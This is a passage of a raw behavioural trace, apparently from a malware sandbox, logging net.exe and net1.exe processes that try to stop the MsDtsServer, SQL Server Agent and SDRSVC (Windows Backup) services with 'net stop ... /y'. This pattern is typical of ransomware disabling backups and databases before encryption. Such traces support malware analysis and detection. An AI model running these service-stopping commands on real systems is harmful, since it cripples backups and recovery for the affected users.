(_String1="svr", _String2="MsDtsServer") returned 6 [0205.321] _wcsicmp (_String1="srv", _String2="MsDtsServer") returned 6 [0205.321] _wcsicmp (_String1="lanmanserver", _String2="MsDtsServer") returned -1 [0205.321] _wcsicmp (_String1="alerter", _String2="MsDtsServer") returned -12 [0205.322] _wcsicmp (_String1="netlogon", _String2="MsDtsServer") returned 1 [0205.322] _wcsupr (in: _String="MsDtsServer" | out: _String="MSDTSSERVER") returned="MSDTSSERVER" [0205.322] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x7d54d0 [0205.324] GetServiceKeyNameW (in: hSCManager=0x7d54d0, lpDisplayName="MSDTSSERVER", lpServiceName=0x61aaf0, lpcchBuffer=0x30f6f0 | out: lpServiceName="", lpcchBuffer=0x30f6f0) returned 0 [0205.325] _wcsicmp (_String1="msg", _String2="MSDTSSERVER") returned 3 [0205.325] _wcsicmp (_String1="messenger", _String2="MSDTSSERVER") returned -14 [0205.325] _wcsicmp (_String1="receiver", _String2="MSDTSSERVER") returned 5 [0205.325] _wcsicmp (_String1="rcv", _String2="MSDTSSERVER") returned 5 [0205.325] _wcsicmp (_String1="redirector", _String2="MSDTSSERVER") returned 5 [0205.325] _wcsicmp (_String1="redir", _String2="MSDTSSERVER") returned 5 [0205.325] _wcsicmp (_String1="rdr", _String2="MSDTSSERVER") returned 5 [0205.325] _wcsicmp (_String1="workstation", _String2="MSDTSSERVER") returned 10 [0205.325] _wcsicmp (_String1="work", _String2="MSDTSSERVER") returned 10 [0205.325] _wcsicmp (_String1="wksta", _String2="MSDTSSERVER") returned 10 [0205.325] _wcsicmp (_String1="prdr", _String2="MSDTSSERVER") returned 3 [0205.325] _wcsicmp (_String1="devrdr", _String2="MSDTSSERVER") returned -9 [0205.325] _wcsicmp (_String1="lanmanworkstation", _String2="MSDTSSERVER") returned -1 [0205.325] _wcsicmp (_String1="server", _String2="MSDTSSERVER") returned 6 [0205.325] _wcsicmp (_String1="svr", _String2="MSDTSSERVER") returned 6 [0205.325] _wcsicmp (_String1="srv", _String2="MSDTSSERVER") returned 6 [0205.325] _wcsicmp (_String1="lanmanserver", _String2="MSDTSSERVER") returned -1 [0205.325] _wcsicmp (_String1="alerter", _String2="MSDTSSERVER") returned -12 [0205.325] _wcsicmp (_String1="netlogon", _String2="MSDTSSERVER") returned 1 [0205.325] NetServiceControl (in: servername=0x0, service="MSDTSSERVER", opcode=0x0, arg=0x0, bufptr=0x30f6ec | out: bufptr=0x30f6ec) returned 0x889 [0205.326] wcscpy_s (in: _Destination=0x61a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0205.326] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0205.329] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a80000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x61b338, nSize=0x800, Arguments=0x619dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0205.330] GetFileType (hFile=0x26c) returned 0x3 [0205.330] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x7d4000 [0205.330] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x7d4000, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0205.330] WriteFile (in: hFile=0x26c, lpBuffer=0x7d4000, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x30f62c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x30f62c, lpOverlapped=0x0) returned 0 [0205.330] LocalFree (hMem=0x7d4000) returned 0x0 [0205.330] GetFileType (hFile=0x26c) returned 0x3 [0205.330] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x7d62a8 [0205.330] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x7d62a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n}", lpUsedDefaultChar=0x0) returned 2 [0205.330] WriteFile (in: hFile=0x26c, lpBuffer=0x7d62a8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x30f62c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x30f62c, lpOverlapped=0x0) returned 0 [0205.330] LocalFree (hMem=0x7d62a8) returned 0x0 [0205.330] _ultow (in: _Dest=0x889, _Radix=3208796 | out: _Dest=0x889) returned="2185" [0205.330] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x61b338, nSize=0x800, Arguments=0x619dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0205.331] GetFileType (hFile=0x26c) returned 0x3 [0205.331] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x7d62a8 [0205.331] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x7d62a8, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0205.331] WriteFile (in: hFile=0x26c, lpBuffer=0x7d62a8, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x30f638, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x30f638, lpOverlapped=0x0) returned 0 [0205.331] LocalFree (hMem=0x7d62a8) returned 0x0 [0205.331] GetFileType (hFile=0x26c) returned 0x3 [0205.331] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x7d62a8 [0205.331] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x7d62a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n}", lpUsedDefaultChar=0x0) returned 2 [0205.331] WriteFile (in: hFile=0x26c, lpBuffer=0x7d62a8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x30f638, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x30f638, lpOverlapped=0x0) returned 0 [0205.331] LocalFree (hMem=0x7d62a8) returned 0x0 [0205.331] NetApiBufferFree (Buffer=0x7d1c70) returned 0x0 [0205.332] NetApiBufferFree (Buffer=0x7d1c88) returned 0x0 [0205.332] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MsDtsServer /y" [0205.332] exit (_Code=2) Process: id = "226" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x1fff9000" os_pid = "0x62c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop SQLAgent$SQL_2008 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 399 os_tid = 0xb3c Process: id = "227" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x31f94000" os_pid = "0xb4c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "226" os_parent_pid = "0x62c" cmd_line = "C:\\Windows\\system32\\net1 stop SQLAgent$SQL_2008 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 400 os_tid = 0xb5c [0205.504] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1bfe74 | out: lpSystemTimeAsFileTime=0x1bfe74*(dwLowDateTime=0x43aecb00, dwHighDateTime=0x1d57a87)) [0205.504] GetCurrentProcessId () returned 0xb4c [0205.504] GetCurrentThreadId () returned 0xb5c [0205.504] GetTickCount () returned 0x116cfdd [0205.504] QueryPerformanceCounter (in: lpPerformanceCount=0x1bfe6c | out: lpPerformanceCount=0x1bfe6c*=32578884790) returned 1 [0205.504] GetModuleHandleA (lpModuleName=0x0) returned 0xdb0000 [0205.505] __set_app_type (_Type=0x1) [0205.505] __p__fmode () returned 0x74eb31f4 [0205.505] __p__commode () returned 0x74eb31fc [0205.505] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xdbffe6) returned 0x0 [0205.505] __getmainargs (in: _Argc=0xdc9064, _Argv=0xdc906c, _Env=0xdc9068, _DoWildCard=0, _StartInfo=0xdc9024 | out: _Argc=0xdc9064, _Argv=0xdc906c, _Env=0xdc9068) returned 0 [0205.505] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0205.505] GetConsoleOutputCP () returned 0x1b5 [0205.505] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xdc9080 | out: lpCPInfo=0xdc9080) returned 1 [0205.505] SetThreadUILanguage (LangId=0x0) returned 0x409 [0205.508] sprintf_s (in: _DstBuf=0x1bfe2c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0205.508] setlocale (category=0, locale=".437") returned="English_United States.437" [0205.510] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0205.510] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0205.510] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$SQL_2008 /y" [0205.510] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1bfbf8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0205.510] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x0, Size=0x76) returned 0x23f788 [0205.511] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0205.511] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1bfdfc | out: Buffer=0x1bfdfc*=0x241c78) returned 0x0 [0205.511] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1bfdfc | out: Buffer=0x1bfdfc*=0x241c90) returned 0x0 [0205.511] _fileno (_File=0x74eb2900) returned -2 [0205.511] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0205.511] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0205.511] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0205.511] _wcsicmp (_String1="config", _String2="stop") returned -16 [0205.511] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0205.511] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0205.511] _wcsicmp (_String1="file", _String2="stop") returned -13 [0205.511] _wcsicmp (_String1="files", _String2="stop") returned -13 [0205.511] _wcsicmp (_String1="group", _String2="stop") returned -12 [0205.511] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0205.511] _wcsicmp (_String1="help", _String2="stop") returned -11 [0205.511] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0205.511] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0205.511] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0205.511] _wcsicmp (_String1="session", _String2="stop") returned -15 [0205.511] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0205.511] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0205.512] _wcsicmp (_String1="share", _String2="stop") returned -12 [0205.512] _wcsicmp (_String1="start", _String2="stop") returned -14 [0205.512] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0205.512] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0205.512] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0205.512] _wcsicmp (_String1="accounts", _String2="SQLAgent$SQL_2008") returned -18 [0205.512] _wcsicmp (_String1="computer", _String2="SQLAgent$SQL_2008") returned -16 [0205.512] _wcsicmp (_String1="config", _String2="SQLAgent$SQL_2008") returned -16 [0205.512] _wcsicmp (_String1="continue", _String2="SQLAgent$SQL_2008") returned -16 [0205.512] _wcsicmp (_String1="cont", _String2="SQLAgent$SQL_2008") returned -16 [0205.512] _wcsicmp (_String1="file", _String2="SQLAgent$SQL_2008") returned -13 [0205.512] _wcsicmp (_String1="files", _String2="SQLAgent$SQL_2008") returned -13 [0205.512] _wcsicmp (_String1="group", _String2="SQLAgent$SQL_2008") returned -12 [0205.512] _wcsicmp (_String1="groups", _String2="SQLAgent$SQL_2008") returned -12 [0205.512] _wcsicmp (_String1="help", _String2="SQLAgent$SQL_2008") returned -11 [0205.512] _wcsicmp (_String1="helpmsg", _String2="SQLAgent$SQL_2008") returned -11 [0205.512] _wcsicmp (_String1="localgroup", _String2="SQLAgent$SQL_2008") returned -7 [0205.512] _wcsicmp (_String1="pause", _String2="SQLAgent$SQL_2008") returned -3 [0205.512] _wcsicmp (_String1="session", _String2="SQLAgent$SQL_2008") returned -12 [0205.512] _wcsicmp (_String1="sessions", _String2="SQLAgent$SQL_2008") returned -12 [0205.512] _wcsicmp (_String1="sess", _String2="SQLAgent$SQL_2008") returned -12 [0205.512] _wcsicmp (_String1="share", _String2="SQLAgent$SQL_2008") returned -9 [0205.512] _wcsicmp (_String1="start", _String2="SQLAgent$SQL_2008") returned 3 [0205.512] _wcsicmp (_String1="stats", _String2="SQLAgent$SQL_2008") returned 3 [0205.512] _wcsicmp (_String1="statistics", _String2="SQLAgent$SQL_2008") returned 3 [0205.512] _wcsicmp (_String1="stop", _String2="SQLAgent$SQL_2008") returned 3 [0205.512] _wcsicmp (_String1="time", _String2="SQLAgent$SQL_2008") returned 1 [0205.512] _wcsicmp (_String1="user", _String2="SQLAgent$SQL_2008") returned 2 [0205.512] _wcsicmp (_String1="users", _String2="SQLAgent$SQL_2008") returned 2 [0205.512] _wcsicmp (_String1="msg", _String2="SQLAgent$SQL_2008") returned -6 [0205.512] _wcsicmp (_String1="messenger", _String2="SQLAgent$SQL_2008") returned -6 [0205.512] _wcsicmp (_String1="receiver", _String2="SQLAgent$SQL_2008") returned -1 [0205.512] _wcsicmp (_String1="rcv", _String2="SQLAgent$SQL_2008") returned -1 [0205.512] _wcsicmp (_String1="netpopup", _String2="SQLAgent$SQL_2008") returned -5 [0205.512] _wcsicmp (_String1="redirector", _String2="SQLAgent$SQL_2008") returned -1 [0205.512] _wcsicmp (_String1="redir", _String2="SQLAgent$SQL_2008") returned -1 [0205.512] _wcsicmp (_String1="rdr", _String2="SQLAgent$SQL_2008") returned -1 [0205.513] _wcsicmp (_String1="workstation", _String2="SQLAgent$SQL_2008") returned 4 [0205.513] _wcsicmp (_String1="work", _String2="SQLAgent$SQL_2008") returned 4 [0205.513] _wcsicmp (_String1="wksta", _String2="SQLAgent$SQL_2008") returned 4 [0205.513] _wcsicmp (_String1="prdr", _String2="SQLAgent$SQL_2008") returned -3 [0205.513] _wcsicmp (_String1="devrdr", _String2="SQLAgent$SQL_2008") returned -15 [0205.513] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAgent$SQL_2008") returned -7 [0205.513] _wcsicmp (_String1="server", _String2="SQLAgent$SQL_2008") returned -12 [0205.513] _wcsicmp (_String1="svr", _String2="SQLAgent$SQL_2008") returned 5 [0205.513] _wcsicmp (_String1="srv", _String2="SQLAgent$SQL_2008") returned 1 [0205.513] _wcsicmp (_String1="lanmanserver", _String2="SQLAgent$SQL_2008") returned -7 [0205.513] _wcsicmp (_String1="alerter", _String2="SQLAgent$SQL_2008") returned -18 [0205.513] _wcsicmp (_String1="netlogon", _String2="SQLAgent$SQL_2008") returned -5 [0205.513] _wcsupr (in: _String="SQLAgent$SQL_2008" | out: _String="SQLAGENT$SQL_2008") returned="SQLAGENT$SQL_2008" [0205.513] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x245460 [0205.516] GetServiceKeyNameW (in: hSCManager=0x245460, lpDisplayName="SQLAGENT$SQL_2008", lpServiceName=0xdcaaf0, lpcchBuffer=0x1bfd98 | out: lpServiceName="", lpcchBuffer=0x1bfd98) returned 0 [0205.516] _wcsicmp (_String1="msg", _String2="SQLAGENT$SQL_2008") returned -6 [0205.516] _wcsicmp (_String1="messenger", _String2="SQLAGENT$SQL_2008") returned -6 [0205.516] _wcsicmp (_String1="receiver", _String2="SQLAGENT$SQL_2008") returned -1 [0205.516] _wcsicmp (_String1="rcv", _String2="SQLAGENT$SQL_2008") returned -1 [0205.516] _wcsicmp (_String1="redirector", _String2="SQLAGENT$SQL_2008") returned -1 [0205.516] _wcsicmp (_String1="redir", _String2="SQLAGENT$SQL_2008") returned -1 [0205.516] _wcsicmp (_String1="rdr", _String2="SQLAGENT$SQL_2008") returned -1 [0205.516] _wcsicmp (_String1="workstation", _String2="SQLAGENT$SQL_2008") returned 4 [0205.516] _wcsicmp (_String1="work", _String2="SQLAGENT$SQL_2008") returned 4 [0205.516] _wcsicmp (_String1="wksta", _String2="SQLAGENT$SQL_2008") returned 4 [0205.516] _wcsicmp (_String1="prdr", _String2="SQLAGENT$SQL_2008") returned -3 [0205.516] _wcsicmp (_String1="devrdr", _String2="SQLAGENT$SQL_2008") returned -15 [0205.516] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAGENT$SQL_2008") returned -7 [0205.516] _wcsicmp (_String1="server", _String2="SQLAGENT$SQL_2008") returned -12 [0205.517] _wcsicmp (_String1="svr", _String2="SQLAGENT$SQL_2008") returned 5 [0205.517] _wcsicmp (_String1="srv", _String2="SQLAGENT$SQL_2008") returned 1 [0205.517] _wcsicmp (_String1="lanmanserver", _String2="SQLAGENT$SQL_2008") returned -7 [0205.517] _wcsicmp (_String1="alerter", _String2="SQLAGENT$SQL_2008") returned -18 [0205.517] _wcsicmp (_String1="netlogon", _String2="SQLAGENT$SQL_2008") returned -5 [0205.517] NetServiceControl (in: servername=0x0, service="SQLAGENT$SQL_2008", opcode=0x0, arg=0x0, bufptr=0x1bfd94 | out: bufptr=0x1bfd94) returned 0x889 [0205.518] wcscpy_s (in: _Destination=0xdca4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0205.518] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0205.518] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xdcb338, nSize=0x800, Arguments=0xdc9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0205.519] GetFileType (hFile=0x26c) returned 0x3 [0205.519] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x243f90 [0205.519] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x243f90, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0205.519] WriteFile (in: hFile=0x26c, lpBuffer=0x243f90, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x1bfcd4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1bfcd4, lpOverlapped=0x0) returned 0 [0205.519] LocalFree (hMem=0x243f90) returned 0x0 [0205.519] GetFileType (hFile=0x26c) returned 0x3 [0205.520] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x246238 [0205.520] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x246238, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n$", lpUsedDefaultChar=0x0) returned 2 [0205.520] WriteFile (in: hFile=0x26c, lpBuffer=0x246238, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1bfcd4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1bfcd4, lpOverlapped=0x0) returned 0 [0205.520] LocalFree (hMem=0x246238) returned 0x0 [0205.520] _ultow (in: _Dest=0x889, _Radix=1834244 | out: _Dest=0x889) returned="2185" [0205.520] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xdcb338, nSize=0x800, Arguments=0xdc9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0205.520] GetFileType (hFile=0x26c) returned 0x3 [0205.520] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x246238 [0205.520] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x246238, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0205.520] WriteFile (in: hFile=0x26c, lpBuffer=0x246238, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x1bfce0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1bfce0, lpOverlapped=0x0) returned 0 [0205.520] LocalFree (hMem=0x246238) returned 0x0 [0205.520] GetFileType (hFile=0x26c) returned 0x3 [0205.520] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x246238 [0205.520] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x246238, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n$", lpUsedDefaultChar=0x0) returned 2 [0205.520] WriteFile (in: hFile=0x26c, lpBuffer=0x246238, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1bfce0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1bfce0, lpOverlapped=0x0) returned 0 [0205.520] LocalFree (hMem=0x246238) returned 0x0 [0205.521] NetApiBufferFree (Buffer=0x241c78) returned 0x0 [0205.521] NetApiBufferFree (Buffer=0x241c90) returned 0x0 [0205.521] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$SQL_2008 /y" [0205.521] exit (_Code=2) Process: id = "228" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x4b3fe000" os_pid = "0xb6c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop SDRSVC /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 401 os_tid = 0xb7c Process: id = "229" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x5fde0000" os_pid = "0xb8c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "228" os_parent_pid = "0xb6c" cmd_line = "C:\\Windows\\system32\\net1 stop SDRSVC /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 402 os_tid = 0xb9c [0205.684] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1bf90c | out: lpSystemTimeAsFileTime=0x1bf90c*(dwLowDateTime=0x43c8fa20, dwHighDateTime=0x1d57a87)) [0205.684] GetCurrentProcessId () returned 0xb8c [0205.685] GetCurrentThreadId () returned 0xb9c [0205.685] GetTickCount () returned 0x116d089 [0205.685] QueryPerformanceCounter (in: lpPerformanceCount=0x1bf904 | out: lpPerformanceCount=0x1bf904*=32596925039) returned 1 [0205.685] GetModuleHandleA (lpModuleName=0x0) returned 0x630000 [0205.685] __set_app_type (_Type=0x1) [0205.685] __p__fmode () returned 0x74eb31f4 [0205.685] __p__commode () returned 0x74eb31fc [0205.685] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x63ffe6) returned 0x0 [0205.685] __getmainargs (in: _Argc=0x649064, _Argv=0x64906c, _Env=0x649068, _DoWildCard=0, _StartInfo=0x649024 | out: _Argc=0x649064, _Argv=0x64906c, _Env=0x649068) returned 0 [0205.686] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0205.686] GetConsoleOutputCP () returned 0x1b5 [0205.686] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x649080 | out: lpCPInfo=0x649080) returned 1 [0205.686] SetThreadUILanguage (LangId=0x0) returned 0x409 [0205.689] sprintf_s (in: _DstBuf=0x1bf8c4, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0205.689] setlocale (category=0, locale=".437") returned="English_United States.437" [0205.691] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0205.691] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0205.691] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SDRSVC /y" [0205.691] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1bf690, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0205.691] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x60) returned 0x3d3c00 [0205.691] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0205.692] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1bf894 | out: Buffer=0x1bf894*=0x3d1c60) returned 0x0 [0205.692] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1bf894 | out: Buffer=0x1bf894*=0x3d1c78) returned 0x0 [0205.692] _fileno (_File=0x74eb2900) returned -2 [0205.692] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0205.692] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0205.692] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0205.692] _wcsicmp (_String1="config", _String2="stop") returned -16 [0205.692] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0205.692] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0205.692] _wcsicmp (_String1="file", _String2="stop") returned -13 [0205.692] _wcsicmp (_String1="files", _String2="stop") returned -13 [0205.692] _wcsicmp (_String1="group", _String2="stop") returned -12 [0205.692] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0205.692] _wcsicmp (_String1="help", _String2="stop") returned -11 [0205.692] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0205.692] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0205.692] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0205.692] _wcsicmp (_String1="session", _String2="stop") returned -15 [0205.692] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0205.692] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0205.692] _wcsicmp (_String1="share", _String2="stop") returned -12 [0205.692] _wcsicmp (_String1="start", _String2="stop") returned -14 [0205.692] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0205.692] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0205.692] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0205.692] _wcsicmp (_String1="accounts", _String2="SDRSVC") returned -18 [0205.692] _wcsicmp (_String1="computer", _String2="SDRSVC") returned -16 [0205.692] _wcsicmp (_String1="config", _String2="SDRSVC") returned -16 [0205.693] _wcsicmp 